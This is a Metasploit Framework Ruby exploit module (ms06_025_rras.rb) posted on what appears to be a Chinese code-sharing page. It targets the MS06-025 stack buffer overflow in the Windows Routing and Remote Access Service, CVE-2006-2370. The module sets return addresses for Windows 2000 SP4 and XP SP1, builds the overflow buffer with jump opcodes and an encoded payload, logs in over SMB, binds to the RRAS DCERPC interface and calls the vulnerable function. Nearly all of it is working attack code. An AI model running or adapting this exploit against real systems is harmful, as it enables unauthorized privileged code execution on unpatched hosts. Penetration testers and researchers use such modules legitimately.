扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 |
## # $Id: ms06_025_rras.rb 9262 2010-05-09 17:45:00Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft RRAS Service Overflow', 'Description'=> %q{ This module exploits a stack buffer overflow in the Windows Routing and Remote Access Service. Since the service is hosted inside svchost.exe, a failed exploit attempt can cause other system services to fail as well. A valid username and password is required to exploit this flaw on Windows 2000. When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'. }, 'Author' => [ 'Nicolas Pouvesle <nicolas.pouvesle [at] gmail.com>', 'hdm' ], 'License'=> MSF_LICENSE, 'Version'=> '$Revision: 9262 $', 'References' => [ [ 'CVE', '2006-2370' ], [ 'OSVDB', '26437' ], [ 'BID', '18325' ], [ 'MSB', 'MS06-025' ] ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Privileged' => true, 'Payload'=> { 'Space'=> 1104, 'BadChars' => "\x00", 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets'=> [ [ 'Windows 2000 SP4', { 'Ret' => 0x7571c1e4 } ], [ 'Windows XP SP1', { 'Ret' => 0x7248d4cc } ], ], 'DisclosureDate' => 'Jun 13 2006')) register_options( [ OptString.new('SMBPIPE', [ true,"The pipe name to use (ROUTER, SRVSVC)", 'ROUTER']), ], self.class) end # Post authentication bugs are rarely useful during automation def autofilter false end def exploit connect() smb_login() handle = dcerpc_handle('20610036-fa22-11cf-9823-00a0c911e5df', '1.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"]) print_status("Binding to #{handle} ...") dcerpc_bind(handle) print_status("Bound to #{handle} ...") print_status('Getting OS...') # Check the remote OS name and version os = smb_peer_os pat = '' case os when /Windows 5\.0/ pat = payload.encoded + "\xeb\x06" + rand_text_alphanumeric(2) + [target.ret].pack('V') + "\xe9\xb7\xfb\xff\xff" os = 'Windows 2000' when /Windows 5\.1/ pat = rand_text_alphanumeric(0x4c) + "\xeb\x06" + rand_text_alphanumeric(2) + [target.ret].pack('V') + payload.encoded os = 'Windows XP' end req = [1, 0x49].pack('VV') + pat + rand_text_alphanumeric(0x4000-pat.length) len = req.length stb = NDR.long(0x20000) + NDR.long(len) + req + NDR.long(len) print_status("Calling the vulnerable function on #{os}...") begin dcerpc.call(0x0C, stb) rescue Rex::Proto::DCERPC::Exceptions::NoResponse rescue => e if e.to_s !~ /STATUS_PIPE_DISCONNECTED/ raise e end end # Cleanup handler disconnect end end |
体验盒子
